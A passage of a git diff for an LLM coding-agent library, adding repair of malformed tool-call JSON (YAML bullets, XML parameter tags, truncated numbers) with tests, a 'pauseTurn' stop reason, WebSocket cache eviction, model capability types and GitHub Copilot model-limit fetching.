"stop"); + }); + + it("maps max_tokens to length", () => { + assert.equal(mapStopReason("max_tokens"), "length"); + }); + + it("maps tool_use to toolUse", () => { + assert.equal(mapStopReason("tool_use"), "toolUse"); + }); + + it("maps pause_turn to pauseTurn (not stop)", () => { + // pause_turn means the server paused a long-running turn (e.g. native + // web search hit its iteration limit). Mapping it to "stop" causes the + // agent loop to exit, leaving an incomplete server_tool_use block in + // history which triggers a 400 on the next request. + assert.equal(mapStopReason("pause_turn"), "pauseTurn"); + }); + + it("throws on unknown stop reason", () => { + assert.throws(() => mapStopReason("bogus"), /Unhandled stop reason/); + }); +}); diff --git a/packages/pi-ai/src/providers/anthropic-shared.ts b/packages/pi-ai/src/providers/anthropic-shared.ts index 4425df7dd..098f50721 100644 --- a/packages/pi-ai/src/providers/anthropic-shared.ts +++ b/packages/pi-ai/src/providers/anthropic-shared.ts @@ -31,6 +31,7 @@ import type { export type AnthropicApi = "anthropic-messages" | "anthropic-vertex"; import type { AssistantMessageEventStream } from "../utils/event-stream.js"; import { parseStreamingJson } from "../utils/json-parse.js"; +import { hasXmlParameterTags, repairToolJson } from "../utils/repair-tool-json.js"; import { sanitizeSurrogates } from "../utils/sanitize-unicode.js"; import { transformMessages } from "./transform-messages.js"; @@ -502,7 +503,7 @@ export function mapStopReason(reason: string): StopReason { case "refusal": return "error"; case "pause_turn": - return "stop"; + return "pauseTurn"; case "stop_sequence": return "stop"; case "sensitive": @@ -696,7 +697,22 @@ export function processAnthropicStream( partial: output, }); } else if (block.type === "toolCall") { - block.arguments = parseStreamingJson(block.partialJson); + // Try strict parse first; if it fails, attempt YAML bullet + // repair (#2660) before falling back to the lenient streaming + // parser which silently swallows errors. + const raw = block.partialJson ?? ""; + const rawForParse = hasXmlParameterTags(raw) ? repairToolJson(raw) : raw; + let parsed: Record | undefined; + try { + parsed = JSON.parse(rawForParse); + } catch { + try { + parsed = JSON.parse(repairToolJson(rawForParse)); + } catch { + // Fall through to streaming parser + } + } + block.arguments = parsed ?? parseStreamingJson(block.partialJson); delete (block as any).partialJson; stream.push({ type: "toolcall_end", diff --git a/packages/pi-ai/src/providers/openai-codex-responses.ts b/packages/pi-ai/src/providers/openai-codex-responses.ts index 3a93e9fa0..294290188 100644 --- a/packages/pi-ai/src/providers/openai-codex-responses.ts +++ b/packages/pi-ai/src/providers/openai-codex-responses.ts @@ -451,6 +451,7 @@ async function* parseSSE(response: Response): AsyncGenerator void; @@ -635,6 +636,20 @@ async function acquireWebSocket( const socket = await connectWebSocket(url, headers, signal); const entry: CachedWebSocketConnection = { socket, busy: true }; + + // Evict the oldest entry if the cache is at capacity (LRU eviction). + if (websocketSessionCache.size >= MAX_WEBSOCKET_CACHE_SIZE) { + const oldestKey = websocketSessionCache.keys().next().value; + if (oldestKey) { + const oldEntry = websocketSessionCache.get(oldestKey); + websocketSessionCache.delete(oldestKey); + if (oldEntry) { + if (oldEntry.idleTimer) clearTimeout(oldEntry.idleTimer); + closeWebSocketSilently(oldEntry.socket); + } + } + } + websocketSessionCache.set(sessionId, entry); return { socket, @@ -705,12 +720,19 @@ async function* parseWebSocket(socket: WebSocketLike, signal?: AbortSignal): Asy resolve(); }; + const cleanup = () => { + socket.removeEventListener("message", onMessage); + socket.removeEventListener("error", onError); + socket.removeEventListener("close", onClose); + signal?.removeEventListener("abort", onAbort); + }; + const onMessage: WebSocketListener = (event) => { void (async () => { - if (!event || typeof event !== "object" || !("data" in event)) return; - const text = await decodeWebSocketData((event as { data?: unknown }).data); - if (!text) return; try { + if (!event || typeof event !== "object" || !("data" in event)) return; + const text = await decodeWebSocketData((event as { data?: unknown }).data); + if (!text) return; const parsed = JSON.parse(text) as Record; const type = typeof parsed.type === "string" ? parsed.type : ""; if (type === "response.completed" || type === "response.done") { @@ -719,7 +741,19 @@ async function* parseWebSocket(socket: WebSocketLike, signal?: AbortSignal): Asy } queue.push(parsed); wake(); - } catch {} + } catch (err) { + // Ensure listeners are cleaned up if the async handler errors. + // Without this, the fire-and-forget promise would swallow the + // error while leaving listeners attached to the socket. + if (err instanceof SyntaxError) { + // JSON parse failure — skip the malformed message. + return; + } + failed = err instanceof Error ? err : new Error(String(err)); + done = true; + cleanup(); + wake(); + } })(); }; @@ -775,10 +809,7 @@ async function* parseWebSocket(socket: WebSocketLike, signal?: AbortSignal): Asy throw new Error("WebSocket stream closed before response.completed"); } } finally { - socket.removeEventListener("message", onMessage); - socket.removeEventListener("error", onError); - socket.removeEventListener("close", onClose); - signal?.removeEventListener("abort", onAbort); + cleanup(); } } diff --git a/packages/pi-ai/src/types.ts b/packages/pi-ai/src/types.ts index af3afc5c8..661b58b57 100644 --- a/packages/pi-ai/src/types.ts +++ b/packages/pi-ai/src/types.ts @@ -13,7 +13,8 @@ export type KnownApi = | "bedrock-converse-stream" | "google-generative-ai" | "google-gemini-cli" - | "google-vertex"; + | "google-vertex" + | "ollama-chat"; export type Api = KnownApi | (string & {}); @@ -43,6 +44,7 @@ export type KnownProvider = | "opencode-go" | "kimi-coding" | "alibaba-coding-plan" + | "ollama" | "ollama-cloud"; export type Provider = KnownProvider | string; @@ -192,7 +194,7 @@ export interface Usage { }; } -export type StopReason = "stop" | "length" | "toolUse" | "error" | "aborted"; +export type StopReason = "stop" | "length" | "toolUse" | "pauseTurn" | "error" | "aborted"; export interface UserMessage { role: "user"; @@ -211,9 +213,23 @@ export interface AssistantMessage { errorMessage?: string; /** Server-requested retry delay in milliseconds (from Retry-After or rate limit headers). */ retryAfterMs?: number; + /** Provider inference performance metrics (e.g. tokens/sec from local models). */ + inferenceMetrics?: InferenceMetrics; timestamp: number; // Unix timestamp in milliseconds } +/** Inference performance metrics reported by providers that support it (e.g. Ollama). */ +export interface InferenceMetrics { + /** Tokens generated per second during eval phase. */ + tokensPerSecond: number; + /** Wall-clock duration of the full request in milliseconds. */ + totalDurationMs: number; + /** Duration of the eval (generation) phase in milliseconds. */ + evalDurationMs: number; + /** Duration of the prompt eval phase in milliseconds. */ + promptEvalDurationMs: number; +} + export interface ToolResultMessage { role: "toolResult"; toolCallId: string; @@ -250,10 +266,10 @@ export type AssistantMessageEvent = | { type: "thinking_end"; contentIndex: number; content: string; partial: AssistantMessage } | { type: "toolcall_start"; contentIndex: number; partial: AssistantMessage } | { type: "toolcall_delta"; contentIndex: number; delta: string; partial: AssistantMessage } - | { type: "toolcall_end"; contentIndex: number; toolCall: ToolCall; partial: AssistantMessage } + | { type: "toolcall_end"; contentIndex: number; toolCall: ToolCall; partial: AssistantMessage; malformedArguments?: boolean } | { type: "server_tool_use"; contentIndex: number; partial: AssistantMessage } | { type: "web_search_result"; contentIndex: number; partial: AssistantMessage } - | { type: "done"; reason: Extract; message: AssistantMessage } + | { type: "done"; reason: Extract; message: AssistantMessage } | { type: "error"; reason: Extract; error: AssistantMessage }; /** @@ -318,6 +334,32 @@ export interface VercelGatewayRouting { order?: string[]; } +/** + * Provider-agnostic capability declarations for a model. + * + * These fields allow models to self-declare supported features so that call + * sites can read from metadata rather than pattern-matching on model IDs or + * provider names. Add fields here as new cross-provider capabilities emerge. + */ +export interface ModelCapabilities { + /** Whether the model supports xhigh thinking level. */ + supportsXhigh?: boolean; + /** + * Whether tool call IDs must be included and normalised in tool results for + * this model. Relevant for models deployed cross-provider (e.g. Claude or + * GPT variants via Google APIs) where the host API imposes stricter ID rules. + */ + requiresToolCallId?: boolean; + /** Whether OpenAI-style service tiers (priority/flex) apply to this model. */ + supportsServiceTier?: boolean; + /** + * Approximate characters per token for this model. + * Used as a fallback when an accurate tokenizer is unavailable. + * If omitted, the provider-level default is used. + */ + charsPerToken?: number; +} + // Model interface for the unified model system export interface Model { id: string; @@ -342,4 +384,11 @@ export interface Model { : TApi extends "openai-responses" ? OpenAIResponsesCompat : never; + /** + * Provider-agnostic capability declarations for this model. + * Read these fields instead of pattern-matching on model IDs or provider names. + */ + capabilities?: ModelCapabilities; + /** Opaque provider-specific options. Cast to the appropriate type in the provider's stream handler. */ + providerOptions?: Record; } diff --git a/packages/pi-ai/src/utils/event-stream.ts b/packages/pi-ai/src/utils/event-stream.ts index 74947477e..7eb0a0104 100644 --- a/packages/pi-ai/src/utils/event-stream.ts +++ b/packages/pi-ai/src/utils/event-stream.ts @@ -80,3 +80,8 @@ export class AssistantMessageEventStream extends EventStream(partialJson: string | undefined): T { - return nativeParseStreamingJson(partialJson); + if (!partialJson || partialJson.trim() === "") { + return {} as T; + } + + // Fast path: try native streaming parser first + const result = nativeParseStreamingJson(partialJson); + + // XML parameter tags can be trapped inside otherwise valid JSON strings, + // so run repair before trusting the native parse result. + if (hasXmlParameterTags(partialJson)) { + try { + return JSON.parse(repairToolJson(partialJson)) as T; + } catch { + // Fall through to the native parser result on incomplete partials + } + } + + // If the native parser returned a non-empty result, use it. + // Only attempt repair when the result is empty AND the input + // contains YAML bullet patterns (avoids unnecessary work). + if ( + result && + typeof result === "object" && + Object.keys(result as object).length === 0 && + hasYamlBulletLists(partialJson) + ) { + try { + return JSON.parse(repairToolJson(partialJson)) as T; + } catch { + // Repair failed — return the empty object from native parser + } + } + + return result; } diff --git a/packages/pi-ai/src/utils/oauth/github-copilot.ts b/packages/pi-ai/src/utils/oauth/github-copilot.ts index 08ffb24d3..eae8e9a5f 100644 --- a/packages/pi-ai/src/utils/oauth/github-copilot.ts +++ b/packages/pi-ai/src/utils/oauth/github-copilot.ts @@ -8,6 +8,8 @@ import type { OAuthCredentials, OAuthLoginCallbacks, OAuthProviderInterface } fr type CopilotCredentials = OAuthCredentials & { enterpriseUrl?: string; + /** Model limits from the /models API, keyed by model ID */ + modelLimits?: Record; }; const decode = (s: string) => atob(s); @@ -305,6 +307,47 @@ async function enableAllGitHubCopilotModels( ); } +async function fetchCopilotModelLimits( + token: string, + enterpriseDomain?: string, +): Promise> { + const baseUrl = getGitHubCopilotBaseUrl(token, enterpriseDomain); + try { + const response = await fetch(`${baseUrl}/models`, { + headers: { + Accept: "application/json", + Authorization: `Bearer ${token}`, + "X-GitHub-Api-Version": "2025-05-01", + ...COPILOT_HEADERS, + }, + signal: AbortSignal.timeout(30_000), + }); + if (!response.ok) return {}; + const data = (await response.json()) as { + data?: Array<{ + id: string; + capabilities?: { + limits?: { + max_context_window_tokens?: number; + max_output_tokens?: number; + }; + }; + }>; + }; + const limits: Record = {}; + for (const m of data.data || []) { + const ctx = m.capabilities?.limits?.max_context_window_tokens; + const out = m.capabilities?.limits?.max_output_tokens; + if (typeof ctx === "number" && typeof out === "number" && ctx > 0 && out > 0 && Number.isFinite(ctx) && Number.isFinite(out)) { + limits[m.id] = { contextWindow: ctx, maxTokens: out }; + } + } + return limits; + } catch { + return {}; + } +} + /** * Login with GitHub Copilot OAuth (device code flow) * @@ -351,6 +394,14 @@ export async function loginGitHubCopilot(options: { // Enable all models after successful login options.onProgress?.("Enabling models..."); await enableAllGitHubCopilotModels(credentials.access, enterpriseDomain ?? undefined); + + // Fetch real model limits from the Copilot API + options.onProgress?.("Fetching model limits..."); + const modelLimits = await fetchCopilotModelLimits(credentials.access, enterpriseDomain ?? undefined); + if (Object.keys(modelLimits).length > 0) { + (credentials as CopilotCredentials).modelLimits = modelLimits; + } + return credentials; } @@ -369,7 +420,16 @@ export const githubCopilotOAuthProvider: OAuthProviderInterface = { async refreshToken(credentials: OAuthCredentials): Promise { const creds = credentials as CopilotCredentials; - return refreshGitHubCopilotToken(creds.refresh, creds.enterpriseUrl); + const refreshed = await refreshGitHubCopilotToken(creds.refresh, creds.enterpriseUrl); + try { + const modelLimits = await fetchCopilotModelLimits(refreshed.access, creds.enterpriseUrl); + if (Object.keys(modelLimits).length > 0) { + (refreshed as CopilotCredentials).modelLimits = modelLimits; + } + } catch { + // Model limits fetch is best-effort; don't block token refresh + } + return refreshed; }, getApiKey(credentials: OAuthCredentials): string { @@ -380,6 +440,18 @@ export const githubCopilotOAuthProvider: OAuthProviderInterface = { const creds = credentials as CopilotCredentials; const domain = creds.enterpriseUrl ? (normalizeDomain(creds.enterpriseUrl) ?? undefined) : undefined; const baseUrl = getGitHubCopilotBaseUrl(creds.access, domain); - return models.map((m) => (m.provider === "github-copilot" ? { ...m, baseUrl } : m)); + const limits = creds.modelLimits; + return models.map((m) => { + if (m.provider !== "github-copilot") return m; + const modelLimits = limits?.[m.id]; + return { + ...m, + baseUrl, + ...(modelLimits && { + contextWindow: modelLimits.contextWindow, + maxTokens: modelLimits.maxTokens, + }), + }; + }); }, }; diff --git a/packages/pi-ai/src/utils/repair-tool-json.ts b/packages/pi-ai/src/utils/repair-tool-json.ts new file mode 100644 index 000000000..27ea7b14c --- /dev/null +++ b/packages/pi-ai/src/utils/repair-tool-json.ts @@ -0,0 +1,220 @@ +/** + * Repair malformed JSON in LLM tool-call arguments. + * + * LLMs sometimes copy YAML template formatting into JSON tool arguments, + * producing patterns like: + * + * "keyDecisions": - Used Web Notification API..., + * "keyFiles": - src-tauri/src/lib.rs — Extended... + * + * instead of valid JSON arrays: + * + * "keyDecisions": ["Used Web Notification API..."], + * "keyFiles": ["src-tauri/src/lib.rs — Extended..."] + * + * This module detects and repairs such patterns before JSON.parse is called. + * + * @see https://github.com/gsd-build/gsd-2/issues/2660 + */ + +/** + * Detect whether a JSON string contains YAML-style bullet-list values + * (i.e. `"key": - item` instead of `"key": ["item"]`). + */ +export function hasYamlBulletLists(json: string): boolean { + // Match: "key": followed by whitespace then a dash-space pattern (YAML bullet) + // The negative lookahead excludes negative numbers (e.g. "key": -1) + return /"\s*:\s*-\s+(?!\d)/.test(json); +} + +/** + * Detect whether a JSON string contains XML parameter tags + * (i.e. `value`). + * + * Some models mix XML tool-call syntax into JSON string values, + * producing hybrid output that fails JSON.parse. + * + * @see https://github.com/gsd-build/gsd-2/issues/3403 + */ +export function hasXmlParameterTags(json: string): boolean { + return /<\/?parameter[\s>]/.test(json); +} + +/** + * Detect whether a JSON string contains truncated numeric values + * (e.g. `"exitCode": -,` or `"durationMs": ,`). + * + * Smaller models sometimes emit incomplete numbers when the value + * is cut off mid-generation. + * + * @see https://github.com/gsd-build/gsd-2/issues/3464 + */ +export function hasTruncatedNumbers(json: string): boolean { + // Match: colon, optional whitespace, then a comma or } without a value + // Or: colon, optional whitespace, bare minus sign followed by comma/} + return /:\s*,/.test(json) || /:\s*-\s*[,}]/.test(json); +} + +type XmlParameterBlock = { + name: string; + value: unknown; +}; + +const xmlParameterBlockPattern = /([\s\S]*?)<\/parameter>/g; + +function parseXmlParameterValue(raw: string): unknown { + const trimmed = raw.trim(); + if (trimmed === "") return ""; + try { + return JSON.parse(trimmed); + } catch { + return trimmed; + } +} + +function extractXmlParameterBlocks(text: string): XmlParameterBlock[] { + const blocks: XmlParameterBlock[] = []; + for (const match of text.matchAll(xmlParameterBlockPattern)) { + blocks.push({ + name: match[1], + value: parseXmlParameterValue(match[2] ?? ""), + }); + } + return blocks; +} + +function trimLeakedXmlTail(fieldName: string, value: string): string { + let cut = value.length; + const parameterIndex = value.indexOf("= 0) cut = Math.min(cut, parameterIndex); + + const closingTagIndex = value.indexOf(``); + if (closingTagIndex >= 0) cut = Math.min(cut, closingTagIndex); + + return value.slice(0, cut).trimEnd(); +} + +/** + * Strip XML `` tags from a JSON string, leaving only the + * text content. This handles the case where the LLM mixes XML + * tool-call format into JSON string values. + */ +function stripXmlParameterTags(json: string): string { + // Remove opening tags: + let cleaned = json.replace(//g, ""); + // Remove closing tags: + cleaned = cleaned.replace(/<\/parameter>/g, ""); + return cleaned; +} + +function promoteXmlParametersToTopLevel(json: string): string { + try { + const parsed = JSON.parse(json) as Record; + if (!parsed || typeof parsed !== "object" || Array.isArray(parsed)) { + return stripXmlParameterTags(json); + } + + let changed = false; + for (const [fieldName, value] of Object.entries(parsed)) { + if (typeof value !== "string" || !hasXmlParameterTags(value)) continue; + + const blocks = extractXmlParameterBlocks(value); + if (blocks.length === 0) continue; + + parsed[fieldName] = trimLeakedXmlTail(fieldName, value); + for (const block of blocks) { + if (!(block.name in parsed)) { + parsed[block.name] = block.value; + } + } + changed = true; + } + + return changed ? JSON.stringify(parsed) : stripXmlParameterTags(json); + } catch { + return stripXmlParameterTags(json); + } +} + +/** + * Replace truncated numeric values with 0. + * Handles: `"key": ,` → `"key": 0,` and `"key": -,` → `"key": 0,` + */ +function repairTruncatedNumbers(json: string): string { + // Bare comma after colon (missing value entirely) + let repaired = json.replace(/:\s*,/g, ": 0,"); + // Bare minus sign followed by comma or closing brace + repaired = repaired.replace(/:\s*-\s*([,}])/g, ": 0$1"); + return repaired; +} + +/** + * Attempt to repair malformed JSON in LLM tool-call arguments. + * + * Handles three categories of malformation: + * + * 1. **YAML bullet lists** (#2660): `"key": - item1\n - item2` → `"key": ["item1", "item2"]` + * 2. **XML parameter tags** (#3403): `value` → stripped to content + * 3. **Truncated numbers** (#3464): `"exitCode": -,` → `"exitCode": 0,` + * + * Returns the original string unchanged if no patterns are detected + * or if the repair itself would produce invalid JSON. + */ +export function repairToolJson(json: string): string { + let repaired = json; + + // Phase 1: Strip XML parameter tags + if (hasXmlParameterTags(repaired)) { + repaired = promoteXmlParametersToTopLevel(repaired); + } + + // Phase 2: Repair truncated numbers + if (hasTruncatedNumbers(repaired)) { + repaired = repairTruncatedNumbers(repaired); + } + + // Phase 3: Repair YAML bullet lists + if (!hasYamlBulletLists(repaired)) { + return repaired; + } + + // Strategy: find each `"key": - item1\n - item2\n - item3` region and + // wrap items in a JSON array. + // + // We work on the raw string because the JSON is not parseable yet. + // The pattern we target: + // "someKey":\s*- item text (possibly multiline) + // optionally followed by more `- item` lines + // terminated by the next `"key":` or `}` or end of string. + + // Match a key followed by YAML-style bullet list. + // Capture: (1) the key portion including colon, (2) the bullet-list body, + // (3) the separator (comma or empty) before the next key/bracket. + // The bullet list body ends at the next `"key":` or `}` or `]` or end of string. + const keyBulletPattern = + /("(?:[^"\\]|\\.)*"\s*:\s*)(- .+?)(,?\s*)(?="(?:[^"\\]|\\.)*"\s*:|[}\]]|$)/gs; + + repaired = repaired.replace( + keyBulletPattern, + (_match, keyPart: string, bulletBody: string, separator: string) => { + // Split the bullet body into individual items on `- ` boundaries. + // Items may contain embedded newlines for multi-line values. + const items = bulletBody + .split(/\n?\s*- /) + .filter((s) => s.trim().length > 0) + .map((s) => s.replace(/,\s*$/, "").trim()); + + // JSON-encode each item as a string, then wrap in an array. + const jsonArray = "[" + items.map((item) => JSON.stringify(item)).join(", ") + "]"; + + // Re-emit the separator (comma) so the next key is properly delimited + const sep = separator.trim() ? separator : (/^\s*"/.test(separator + "x") ? ", " : ""); + return keyPart + jsonArray + sep; + }, + ); + + // Strip trailing commas before } or ] (common in repaired JSON) + repaired = repaired.replace(/,(\s*[}\]])/g, "$1"); + + return repaired; +} diff --git a/packages/pi-ai/src/utils/tests/json-parse.test.ts b/packages/pi-ai/src/utils/tests/json-parse.test.ts new file mode 100644 index 000000000..1ce50751a --- /dev/null +++ b/packages/pi-ai/src/utils/tests/json-parse.test.ts @@ -0,0 +1,17 @@ +import { describe, test } from "node:test"; +import assert from "node:assert/strict"; +import { parseStreamingJson } from "../json-parse.js"; + +describe("parseStreamingJson — XML parameter recovery (#3751)", () => { + test("promotes XML parameters trapped inside valid JSON string values", () => { + const malformed = + '{"narrative":"text.\\nall tests pass\\n[\\"npm test\\"]","oneLiner":"done"}'; + + const parsed = parseStreamingJson>(malformed); + + assert.equal(parsed.narrative, "text."); + assert.equal(parsed.verification, "all tests pass"); + assert.deepEqual(parsed.verificationEvidence, ["npm test"]); + assert.equal(parsed.oneLiner, "done"); + }); +}); diff --git a/packages/pi-ai/src/utils/tests/repair-tool-json.test.ts b/packages/pi-ai/src/utils/tests/repair-tool-json.test.ts new file mode 100644 index 000000000..433f6efc0 --- /dev/null +++ b/packages/pi-ai/src/utils/tests/repair-tool-json.test.ts @@ -0,0 +1,208 @@ +import { describe, test } from "node:test"; +import assert from "node:assert/strict"; +import { repairToolJson, hasYamlBulletLists, hasXmlParameterTags, hasTruncatedNumbers } from "../repair-tool-json.js"; + +describe("repairToolJson — YAML bullet list repair (#2660)", () => { + // ── Detection ────────────────────────────────────────────────────────── + + test("hasYamlBulletLists detects YAML-style bullets", () => { + assert.equal( + hasYamlBulletLists('"keyDecisions": - Used Web Notification API'), + true, + ); + }); + + test("hasYamlBulletLists ignores negative numbers", () => { + assert.equal( + hasYamlBulletLists('"offset": -1'), + false, + "negative number should not be detected as YAML bullet", + ); + }); + + test("hasYamlBulletLists returns false for valid JSON", () => { + assert.equal( + hasYamlBulletLists('{"keyDecisions": ["item1", "item2"]}'), + false, + ); + }); + + // ── Single bullet item ──────────────────────────────────────────────── + + test("repairs single YAML bullet to JSON array", () => { + const malformed = '{"keyDecisions": - Used Web Notification API}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.deepEqual(parsed.keyDecisions, ["Used Web Notification API"]); + }); + + // ── Multiple bullet items (newline-separated) ───────────────────────── + + test("repairs multiple YAML bullets separated by newlines", () => { + const malformed = + '{"keyDecisions": - Used Web Notification API\n - Chose Tauri over Electron\n - Adopted SQLite for storage, "title": "M005"}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.deepEqual(parsed.keyDecisions, [ + "Used Web Notification API", + "Chose Tauri over Electron", + "Adopted SQLite for storage", + ]); + assert.equal(parsed.title, "M005"); + }); + + // ── Multiple fields with YAML bullets ───────────────────────────────── + + test("repairs multiple fields each with YAML bullet lists", () => { + const malformed = + '{"keyDecisions": - decision one\n - decision two, "keyFiles": - src/lib.rs — Extended menu\n - src/main.ts — Entry point, "title": "done"}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.deepEqual(parsed.keyDecisions, ["decision one", "decision two"]); + assert.deepEqual(parsed.keyFiles, [ + "src/lib.rs \u2014 Extended menu", + "src/main.ts \u2014 Entry point", + ]); + assert.equal(parsed.title, "done"); + }); + + // ── Exact reproduction from issue #2660 ─────────────────────────────── + + test("repairs the exact malformed JSON from issue #2660", () => { + const malformed = `{"milestoneId": "M005", "title": "Native Desktop Polish", "oneLiner": "summary", "narrative": "details", "successCriteriaResults": "all pass", "definitionOfDoneResults": "all done", "requirementOutcomes": "met", "keyDecisions": - Used Web Notification API (new window.Notification()) instead of Tauri sendNotification wrapper, "keyFiles": - src-tauri/src/lib.rs \u2014 Extended menu builder with notification toggle, "lessonsLearned": - Always test notification permissions before sending, "followUps": "none", "deviations": "none", "verificationPassed": true}`; + + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + + assert.equal(parsed.milestoneId, "M005"); + assert.equal(parsed.title, "Native Desktop Polish"); + assert.ok(Array.isArray(parsed.keyDecisions), "keyDecisions should be an array"); + assert.ok(parsed.keyDecisions[0].includes("Web Notification API")); + assert.ok(Array.isArray(parsed.keyFiles), "keyFiles should be an array"); + assert.ok(parsed.keyFiles[0].includes("src-tauri/src/lib.rs")); + assert.ok(Array.isArray(parsed.lessonsLearned), "lessonsLearned should be an array"); + assert.equal(parsed.verificationPassed, true); + }); + + // ── Passthrough for valid JSON ──────────────────────────────────────── + + test("returns valid JSON unchanged", () => { + const valid = '{"keyDecisions": ["item1", "item2"], "count": -5}'; + const result = repairToolJson(valid); + assert.equal(result, valid, "valid JSON should be returned unchanged"); + }); + + // ── Negative numbers are preserved ──────────────────────────────────── + + test("does not mangle negative numbers", () => { + const valid = '{"offset": -1, "limit": -100}'; + const result = repairToolJson(valid); + assert.equal(result, valid); + }); +}); + +// ═══════════════════════════════════════════════════════════════════════════ +// XML parameter tag repair (#3403) +// ═══════════════════════════════════════════════════════════════════════════ + +describe("repairToolJson — XML parameter tag stripping (#3403)", () => { + test("hasXmlParameterTags detects opening tags", () => { + assert.equal( + hasXmlParameterTags('some text'), + true, + ); + }); + + test("hasXmlParameterTags returns false for clean JSON", () => { + assert.equal( + hasXmlParameterTags('{"narrative": "some text"}'), + false, + ); + }); + + test("strips XML parameter tags from JSON values", () => { + const malformed = '{"sliceId": "S03", "narrative": The slice work}'; + const repaired = repairToolJson(malformed); + // After stripping tags, the content should be parseable or at least tag-free + assert.ok(!repaired.includes(""), "should not contain tags"); + }); + + test("handles mixed XML and JSON content", () => { + const malformed = '{"oneLiner": "done", "verification": all tests pass}'; + const repaired = repairToolJson(malformed); + assert.ok(!repaired.includes(" { + const malformed = + '{"narrative":"text.\\nall tests pass\\n[\\"npm test\\"]","oneLiner":"done"}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + + assert.equal(parsed.narrative, "text."); + assert.equal(parsed.verification, "all tests pass"); + assert.deepEqual(parsed.verificationEvidence, ["npm test"]); + assert.equal(parsed.oneLiner, "done"); + assert.ok(!parsed.narrative.includes(" { + test("hasTruncatedNumbers detects bare comma after colon", () => { + assert.equal(hasTruncatedNumbers('"exitCode": ,'), true); + }); + + test("hasTruncatedNumbers detects bare minus before comma", () => { + assert.equal(hasTruncatedNumbers('"exitCode": -,'), true); + }); + + test("hasTruncatedNumbers detects bare minus before closing brace", () => { + assert.equal(hasTruncatedNumbers('"durationMs": -}'), true); + }); + + test("hasTruncatedNumbers returns false for valid numbers", () => { + assert.equal(hasTruncatedNumbers('"exitCode": 0, "durationMs": 1234'), false); + }); + + test("hasTruncatedNumbers returns false for negative numbers", () => { + assert.equal(hasTruncatedNumbers('"exitCode": -1, "offset": -100'), false); + }); + + test("repairs truncated exitCode with bare comma", () => { + const malformed = '{"command": "npm test", "exitCode": , "verdict": "pass", "durationMs": 500}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.equal(parsed.exitCode, 0); + assert.equal(parsed.durationMs, 500); + }); + + test("repairs truncated exitCode with bare minus", () => { + const malformed = '{"command": "npm test", "exitCode": -, "verdict": "pass", "durationMs": 1234}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.equal(parsed.exitCode, 0); + assert.equal(parsed.verdict, "pass"); + }); + + test("repairs truncated durationMs at end of object", () => { + const malformed = '{"command": "npm test", "exitCode": 0, "verdict": "pass", "durationMs": -}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.equal(parsed.durationMs, 0); + assert.equal(parsed.exitCode, 0); + }); + + test("does not mangle valid negative numbers", () => { + const valid = '{"exitCode": -1, "offset": -100}'; + const repaired = repairToolJson(valid); + const parsed = JSON.parse(repaired); + assert.equal(parsed.exitCode, -1); + assert.equal(parsed.offset, -100); + }); +}); diff --git a/packages/pi-coding-agent/package.json b/packages/pi-coding-agent/package.json index 7b99a5490..9561c73a4 100644 --- a/packages/pi-coding-agent/package.json +++ b/packages/pi-coding-agent/package.json @@ -1,6 +1,6 @@ { "name": "@gsd/pi-coding-agent", - "version": "2.41.0", + "version": "2.67.0", "description": "Coding agent CLI (vendored from pi-mono)", "type": "module", "piConfig": { diff --git a/packages/pi-coding-agent/pnpm-lock.yaml b/packages/pi-coding-agent/pnpm-lock.yaml deleted file mode 100644 index 32e860496..000000000 --- a/packages/pi-coding-agent/pnpm-lock.yaml +++ /dev/null @@ -1,454 +0,0 @@ -lockfileVersion: '9.0' - -settings: - autoInstallPeers: true - excludeLinksFromLockfile: false - -importers: - - .: - dependencies: - '@mariozechner/jiti': - specifier: ^2.6.2 - version: 2.6.5 - '@silvia-odwyer/photon-node': - specifier: ^0.3.4 - version: 0.3.4 - chalk: - specifier: ^5.5.0 - version: 5.6.2 - diff: - specifier: ^8.0.2 - version: 8.0.3 - extract-zip: - specifier: ^2.0.1 - version: 2.0.1 - file-type: - specifier: ^21.1.1 - version: 21.3.2 - glob: - specifier: ^13.0.1 - version: 13.0.6 - hosted-git-info: - specifier: ^9.0.2 - version: 9.0.2 - ignore: - specifier: ^7.0.5 - version: 7.0.5 - marked: - specifier: ^15.0.12 - version: 15.0.12 - minimatch: - specifier: ^10.2.3 - version: 10.2.4 - proper-lockfile: - specifier: ^4.1.2 - version: 4.1.2 - sql.js: - specifier: ^1.14.1 - version: 1.14.1 - strip-ansi: - specifier: ^7.1.0 - version: 7.2.0 - undici: - specifier: ^7.24.2 - version: 7.24.4 - yaml: - specifier: ^2.8.2 - version: 2.8.2 - devDependencies: - '@types/diff': - specifier: ^7.0.2 - version: 7.0.2 - '@types/hosted-git-info': - specifier: ^3.0.5 - version: 3.0.5 - '@types/proper-lockfile': - specifier: ^4.1.4 - version: 4.1.4 - '@types/sql.js': - specifier: ^1.4.9 - version: 1.4.9 - -packages: - - '@borewit/text-codec@0.2.2': - resolution: {integrity: sha512-DDaRehssg1aNrH4+2hnj1B7vnUGEjU6OIlyRdkMd0aUdIUvKXrJfXsy8LVtXAy7DRvYVluWbMspsRhz2lcW0mQ==} - - '@mariozechner/jiti@2.6.5': - resolution: {integrity: sha512-faGUlTcXka5l7rv0lP3K3vGW/ejRuOS24RR2aSFWREUQqzjgdsuWNo/IiPqL3kWRGt6Ahl2+qcDAwtdeWeuGUw==} - hasBin: true - - '@silvia-odwyer/photon-node@0.3.4': - resolution: {integrity: sha512-bnly4BKB3KDTFxrUIcgCLbaeVVS8lrAkri1pEzskpmxu9MdfGQTy8b8EgcD83ywD3RPMsIulY8xJH5Awa+t9fA==} - - '@tokenizer/inflate@0.4.1': - resolution: {integrity: sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA==} - engines: {node: '>=18'} - - '@tokenizer/token@0.3.0': - resolution: {integrity: sha512-OvjF+z51L3ov0OyAU0duzsYuvO01PH7x4t6DJx+guahgTnBHkhJdG7soQeTSFLWN3efnHyibZ4Z8l2EuWwJN3A==} - - '@types/diff@7.0.2': - resolution: {integrity: 